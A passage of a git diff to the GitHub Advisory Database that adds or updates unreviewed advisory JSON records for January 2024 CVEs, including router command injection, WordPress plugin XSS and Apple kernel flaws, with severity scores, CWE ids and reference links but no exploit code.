"1.4.0", + "id": "GHSA-qghg-5fph-q28c", + "modified": "2024-01-31T06:30:17Z", + "published": "2024-01-31T06:30:17Z", + "aliases": [ + "CVE-2024-0914" + ], + "details": "A timing side-channel vulnerability has been discovered in the opencryptoki package while processing RSA PKCS#1 v1.5 padded ciphertexts. This flaw could potentially enable unauthorized RSA ciphertext decryption or signing, even without access to the corresponding private key.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0914" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2024-0914" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2260407" + }, + { + "type": "WEB", + "url": "https://people.redhat.com/~hkario/marvin/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-203" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T05:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-qgmp-pg7x-2982/GHSA-qgmp-pg7x-2982.json b/advisories/unreviewed/2024/01/GHSA-qgmp-pg7x-2982/GHSA-qgmp-pg7x-2982.json new file mode 100644 index 0000000000000..857bba2236d8d --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-qgmp-pg7x-2982/GHSA-qgmp-pg7x-2982.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qgmp-pg7x-2982", + "modified": "2024-02-08T18:30:38Z", + "published": "2024-01-31T00:30:17Z", + "aliases": [ + "CVE-2023-51197" + ], + "details": "An issue discovered in shell command execution in ROS2 (Robot Operating System 2) Foxy Fitzroy, with ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows an attacker to run arbitrary commands and cause other impacts.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51197" + }, + { + "type": "WEB", + "url": "https://github.com/16yashpatel/CVE-2023-51197" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T22:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-qh5h-jvwg-m9xw/GHSA-qh5h-jvwg-m9xw.json b/advisories/unreviewed/2024/01/GHSA-qh5h-jvwg-m9xw/GHSA-qh5h-jvwg-m9xw.json index 74ee3f6142ecf..fab6e66cbc83f 100644 --- a/advisories/unreviewed/2024/01/GHSA-qh5h-jvwg-m9xw/GHSA-qh5h-jvwg-m9xw.json +++ b/advisories/unreviewed/2024/01/GHSA-qh5h-jvwg-m9xw/GHSA-qh5h-jvwg-m9xw.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-qh5h-jvwg-m9xw", - "modified": "2024-01-23T03:31:08Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T03:31:08Z", "aliases": [ "CVE-2024-23215" ], "details": "An issue was addressed with improved handling of temporary files. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to access user-sensitive data.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -55,7 +58,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T01:15:11Z" diff --git a/advisories/unreviewed/2024/01/GHSA-qhv7-h7vp-v9vr/GHSA-qhv7-h7vp-v9vr.json b/advisories/unreviewed/2024/01/GHSA-qhv7-h7vp-v9vr/GHSA-qhv7-h7vp-v9vr.json new file mode 100644 index 0000000000000..5af91b7cd2db3 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-qhv7-h7vp-v9vr/GHSA-qhv7-h7vp-v9vr.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qhv7-h7vp-v9vr", + "modified": "2024-01-29T09:30:24Z", + "published": "2024-01-29T09:30:24Z", + "aliases": [ + "CVE-2023-45921" + ], + "details": "Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45921" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T09:15:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-qj3p-g2m7-rx94/GHSA-qj3p-g2m7-rx94.json b/advisories/unreviewed/2024/01/GHSA-qj3p-g2m7-rx94/GHSA-qj3p-g2m7-rx94.json new file mode 100644 index 0000000000000..d82a266b3e509 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-qj3p-g2m7-rx94/GHSA-qj3p-g2m7-rx94.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qj3p-g2m7-rx94", + "modified": "2024-02-08T18:30:39Z", + "published": "2024-01-31T18:31:26Z", + "aliases": [ + "CVE-2023-5390" + ], + "details": "An attacker could potentially exploit this vulnerability, leading to files being read from the Honeywell Experion ControlEdge VirtualUOC and ControlEdge UOC. This exploit could be used to read files from the controller that may expose limited information from the device. Honeywell recommends updating to the most recent version of the product. See Honeywell Security Notification for recommendations on upgrading and versioning.\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5390" + }, + { + "type": "WEB", + "url": "https://process.honeywell.com" + }, + { + "type": "WEB", + "url": "https://www.honeywell.com/us/en/product-security" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22", + "CWE-36" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T18:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-qjqj-4cq6-6f2f/GHSA-qjqj-4cq6-6f2f.json b/advisories/unreviewed/2024/01/GHSA-qjqj-4cq6-6f2f/GHSA-qjqj-4cq6-6f2f.json index fe8a5d2e51cee..ec88d446e8e12 100644 --- a/advisories/unreviewed/2024/01/GHSA-qjqj-4cq6-6f2f/GHSA-qjqj-4cq6-6f2f.json +++ b/advisories/unreviewed/2024/01/GHSA-qjqj-4cq6-6f2f/GHSA-qjqj-4cq6-6f2f.json @@ -36,7 +36,8 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-qmff-49xc-7rf6/GHSA-qmff-49xc-7rf6.json b/advisories/unreviewed/2024/01/GHSA-qmff-49xc-7rf6/GHSA-qmff-49xc-7rf6.json index 7b9980fb82688..ec11342f8c1e3 100644 --- a/advisories/unreviewed/2024/01/GHSA-qmff-49xc-7rf6/GHSA-qmff-49xc-7rf6.json +++ b/advisories/unreviewed/2024/01/GHSA-qmff-49xc-7rf6/GHSA-qmff-49xc-7rf6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qmff-49xc-7rf6", - "modified": "2024-01-24T21:30:32Z", + "modified": "2024-02-07T21:30:26Z", "published": "2024-01-17T18:31:36Z", "aliases": [ "CVE-2024-0646" @@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0646" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0723" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0724" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0725" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2024-0646" diff --git a/advisories/unreviewed/2024/01/GHSA-qpjv-gm6g-p2gh/GHSA-qpjv-gm6g-p2gh.json b/advisories/unreviewed/2024/01/GHSA-qpjv-gm6g-p2gh/GHSA-qpjv-gm6g-p2gh.json new file mode 100644 index 0000000000000..2a880d492f273 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-qpjv-gm6g-p2gh/GHSA-qpjv-gm6g-p2gh.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qpjv-gm6g-p2gh", + "modified": "2024-01-31T06:30:17Z", + "published": "2024-01-31T06:30:17Z", + "aliases": [ + "CVE-2023-3934" + ], + "details": "Rejected reason: Please discard this CVE, we are not using this anymore. The vulnerability turned out to be a non-security issue", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3934" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T06:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-qr6c-pgxx-rqc6/GHSA-qr6c-pgxx-rqc6.json b/advisories/unreviewed/2024/01/GHSA-qr6c-pgxx-rqc6/GHSA-qr6c-pgxx-rqc6.json new file mode 100644 index 0000000000000..a99d5902179a1 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-qr6c-pgxx-rqc6/GHSA-qr6c-pgxx-rqc6.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qr6c-pgxx-rqc6", + "modified": "2024-01-31T18:31:26Z", + "published": "2024-01-31T18:31:26Z", + "aliases": [ + "CVE-2024-22307" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Lab WP-Lister Lite for eBay allows Reflected XSS.This issue affects WP-Lister Lite for eBay: from n/a through 3.5.7.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22307" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/wp-lister-for-ebay/wordpress-wp-lister-lite-for-ebay-plugin-3-5-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T17:15:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-qrph-vx83-8q9v/GHSA-qrph-vx83-8q9v.json b/advisories/unreviewed/2024/01/GHSA-qrph-vx83-8q9v/GHSA-qrph-vx83-8q9v.json index e277f34e9d0c0..f25fe07c2a633 100644 --- a/advisories/unreviewed/2024/01/GHSA-qrph-vx83-8q9v/GHSA-qrph-vx83-8q9v.json +++ b/advisories/unreviewed/2024/01/GHSA-qrph-vx83-8q9v/GHSA-qrph-vx83-8q9v.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-qrph-vx83-8q9v", - "modified": "2024-01-23T12:30:29Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T12:30:29Z", "aliases": [ "CVE-2024-23182" ], "details": "Relative path traversal vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to delete arbitrary files on the server.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-22" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T10:15:10Z" diff --git a/advisories/unreviewed/2024/01/GHSA-qrpx-55hc-9pr8/GHSA-qrpx-55hc-9pr8.json b/advisories/unreviewed/2024/01/GHSA-qrpx-55hc-9pr8/GHSA-qrpx-55hc-9pr8.json new file mode 100644 index 0000000000000..ffce22608aac1 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-qrpx-55hc-9pr8/GHSA-qrpx-55hc-9pr8.json @@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qrpx-55hc-9pr8", + "modified": "2024-01-29T15:30:29Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2024-1000" + ], + "details": "A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216. It has been rated as critical. This issue affects the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument command leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252269 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1000" + }, + { + "type": "WEB", + "url": "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setTracerouteCfg-b6b3fe05b4a945a3bc460dbcb61dfc75?pvs=4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252269" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252269" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121", + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T14:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-qrr8-cg7m-h9r4/GHSA-qrr8-cg7m-h9r4.json b/advisories/unreviewed/2024/01/GHSA-qrr8-cg7m-h9r4/GHSA-qrr8-cg7m-h9r4.json index 02f53ccf3e272..e37e1270eac82 100644 --- a/advisories/unreviewed/2024/01/GHSA-qrr8-cg7m-h9r4/GHSA-qrr8-cg7m-h9r4.json +++ b/advisories/unreviewed/2024/01/GHSA-qrr8-cg7m-h9r4/GHSA-qrr8-cg7m-h9r4.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6592" }, + { + "type": "WEB", + "url": "https://research.cleantalk.org/cve-2023-6592-fastdup-database-users-password-leak-poc-exploit/" + }, { "type": "WEB", "url": "https://wpscan.com/vulnerability/a39bb807-b143-4863-88ff-1783e407d7d4/" diff --git a/advisories/unreviewed/2024/01/GHSA-qwm3-5pgj-28qh/GHSA-qwm3-5pgj-28qh.json b/advisories/unreviewed/2024/01/GHSA-qwm3-5pgj-28qh/GHSA-qwm3-5pgj-28qh.json index ae51595727f81..86256dad1e8ca 100644 --- a/advisories/unreviewed/2024/01/GHSA-qwm3-5pgj-28qh/GHSA-qwm3-5pgj-28qh.json +++ b/advisories/unreviewed/2024/01/GHSA-qwm3-5pgj-28qh/GHSA-qwm3-5pgj-28qh.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-qwm3-5pgj-28qh", - "modified": "2024-01-23T03:31:08Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T03:31:08Z", "aliases": [ "CVE-2024-23212" ], "details": "The issue was addressed with improved memory handling. This issue is fixed in watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, macOS Ventura 13.6.4, macOS Monterey 12.7.3. An app may be able to execute arbitrary code with kernel privileges.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -79,7 +82,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T01:15:11Z" diff --git a/advisories/unreviewed/2024/01/GHSA-qxvp-mr53-fp4v/GHSA-qxvp-mr53-fp4v.json b/advisories/unreviewed/2024/01/GHSA-qxvp-mr53-fp4v/GHSA-qxvp-mr53-fp4v.json index 7a3c8e8fa7b2f..f70f3c93c0d21 100644 --- a/advisories/unreviewed/2024/01/GHSA-qxvp-mr53-fp4v/GHSA-qxvp-mr53-fp4v.json +++ b/advisories/unreviewed/2024/01/GHSA-qxvp-mr53-fp4v/GHSA-qxvp-mr53-fp4v.json @@ -28,7 +28,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-79" + "CWE-79", + "CWE-80" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-r2mg-qw96-w89q/GHSA-r2mg-qw96-w89q.json b/advisories/unreviewed/2024/01/GHSA-r2mg-qw96-w89q/GHSA-r2mg-qw96-w89q.json index 0b4a5af508a3d..8b4539e36289c 100644 --- a/advisories/unreviewed/2024/01/GHSA-r2mg-qw96-w89q/GHSA-r2mg-qw96-w89q.json +++ b/advisories/unreviewed/2024/01/GHSA-r2mg-qw96-w89q/GHSA-r2mg-qw96-w89q.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-r2mg-qw96-w89q", - "modified": "2024-01-23T03:31:08Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T03:31:08Z", "aliases": [ "CVE-2024-23208" ], "details": "The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to execute arbitrary code with kernel privileges.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -55,7 +58,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T01:15:10Z" diff --git a/advisories/unreviewed/2024/01/GHSA-r3xx-hr64-gmm2/GHSA-r3xx-hr64-gmm2.json b/advisories/unreviewed/2024/01/GHSA-r3xx-hr64-gmm2/GHSA-r3xx-hr64-gmm2.json index eff32ce442622..d0e08bb8c1d30 100644 --- a/advisories/unreviewed/2024/01/GHSA-r3xx-hr64-gmm2/GHSA-r3xx-hr64-gmm2.json +++ b/advisories/unreviewed/2024/01/GHSA-r3xx-hr64-gmm2/GHSA-r3xx-hr64-gmm2.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-r3xx-hr64-gmm2", - "modified": "2024-01-25T21:32:15Z", + "modified": "2024-01-29T18:31:48Z", "published": "2024-01-25T21:32:15Z", "aliases": [ "CVE-2024-22636" ], "details": "PluXml Blog v5.8.9 was discovered to contain a remote code execution (RCE) vulnerability in the Static Pages feature. This vulnerability is exploited via injecting a crafted payload into the Content field.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-r7mg-69gq-5g8v/GHSA-r7mg-69gq-5g8v.json b/advisories/unreviewed/2024/01/GHSA-r7mg-69gq-5g8v/GHSA-r7mg-69gq-5g8v.json index 04e7d31ce3085..7afa70719015c 100644 --- a/advisories/unreviewed/2024/01/GHSA-r7mg-69gq-5g8v/GHSA-r7mg-69gq-5g8v.json +++ b/advisories/unreviewed/2024/01/GHSA-r7mg-69gq-5g8v/GHSA-r7mg-69gq-5g8v.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-r7mg-69gq-5g8v", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-29T18:31:48Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-52326" ], "details": "Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers.\n\nPlease note this vulnerability is similar, but not identical to CVE-2023-52327.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-r8vw-x62m-xcj4/GHSA-r8vw-x62m-xcj4.json b/advisories/unreviewed/2024/01/GHSA-r8vw-x62m-xcj4/GHSA-r8vw-x62m-xcj4.json new file mode 100644 index 0000000000000..627d4b37407a2 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-r8vw-x62m-xcj4/GHSA-r8vw-x62m-xcj4.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r8vw-x62m-xcj4", + "modified": "2024-02-05T21:30:31Z", + "published": "2024-01-31T18:31:26Z", + "aliases": [ + "CVE-2024-23508" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bPlugins PDF Poster – PDF Embedder Plugin for WordPress allows Reflected XSS.This issue affects PDF Poster – PDF Embedder Plugin for WordPress: from n/a through 2.1.17.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23508" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/pdf-poster/wordpress-pdf-poster-plugin-2-1-17-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T16:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-r9gf-434r-vm83/GHSA-r9gf-434r-vm83.json b/advisories/unreviewed/2024/01/GHSA-r9gf-434r-vm83/GHSA-r9gf-434r-vm83.json new file mode 100644 index 0000000000000..eaea96189d8ce --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-r9gf-434r-vm83/GHSA-r9gf-434r-vm83.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r9gf-434r-vm83", + "modified": "2024-02-01T06:31:05Z", + "published": "2024-01-30T15:30:22Z", + "aliases": [ + "CVE-2024-24326" + ], + "details": "TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the arpEnable parameter in the setStaticDhcpRules function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24326" + }, + { + "type": "WEB", + "url": "https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/8/TOTOlink%20A3300R%20setStaticDhcpRules.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-rc4g-22pj-c822/GHSA-rc4g-22pj-c822.json b/advisories/unreviewed/2024/01/GHSA-rc4g-22pj-c822/GHSA-rc4g-22pj-c822.json new file mode 100644 index 0000000000000..9cccb653642a3 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-rc4g-22pj-c822/GHSA-rc4g-22pj-c822.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rc4g-22pj-c822", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2024-22570" + ], + "details": "A stored cross-site scripting (XSS) vulnerability in /install.php?m=install&c=index&a=step3 of GreenCMS v2.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22570" + }, + { + "type": "WEB", + "url": "https://github.com/Num-Nine/CVE/issues/11" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T20:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-rcj8-jx65-7c4r/GHSA-rcj8-jx65-7c4r.json b/advisories/unreviewed/2024/01/GHSA-rcj8-jx65-7c4r/GHSA-rcj8-jx65-7c4r.json index 38a1e52e636b0..1f764669a663e 100644 --- a/advisories/unreviewed/2024/01/GHSA-rcj8-jx65-7c4r/GHSA-rcj8-jx65-7c4r.json +++ b/advisories/unreviewed/2024/01/GHSA-rcj8-jx65-7c4r/GHSA-rcj8-jx65-7c4r.json @@ -44,6 +44,10 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EJBMCWQ54R6ZL3MYU2D2JBW6JMZL7BQW/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-30" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-rcv3-6pgv-6p72/GHSA-rcv3-6pgv-6p72.json b/advisories/unreviewed/2024/01/GHSA-rcv3-6pgv-6p72/GHSA-rcv3-6pgv-6p72.json index a2d967caafaf7..af8e8b5ce6578 100644 --- a/advisories/unreviewed/2024/01/GHSA-rcv3-6pgv-6p72/GHSA-rcv3-6pgv-6p72.json +++ b/advisories/unreviewed/2024/01/GHSA-rcv3-6pgv-6p72/GHSA-rcv3-6pgv-6p72.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-rcv3-6pgv-6p72", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-29T21:30:27Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-47202" ], "details": "A local file inclusion vulnerability on the Trend Micro Apex One management server could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-rf89-gmj8-r696/GHSA-rf89-gmj8-r696.json b/advisories/unreviewed/2024/01/GHSA-rf89-gmj8-r696/GHSA-rf89-gmj8-r696.json index a2d410b84d79a..783f89ade98f0 100644 --- a/advisories/unreviewed/2024/01/GHSA-rf89-gmj8-r696/GHSA-rf89-gmj8-r696.json +++ b/advisories/unreviewed/2024/01/GHSA-rf89-gmj8-r696/GHSA-rf89-gmj8-r696.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-rf89-gmj8-r696", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-47197" ], "details": "An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis vulnerability is similar to, but not identical to, CVE-2023-47198.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-rm8m-jx8f-gg9f/GHSA-rm8m-jx8f-gg9f.json b/advisories/unreviewed/2024/01/GHSA-rm8m-jx8f-gg9f/GHSA-rm8m-jx8f-gg9f.json new file mode 100644 index 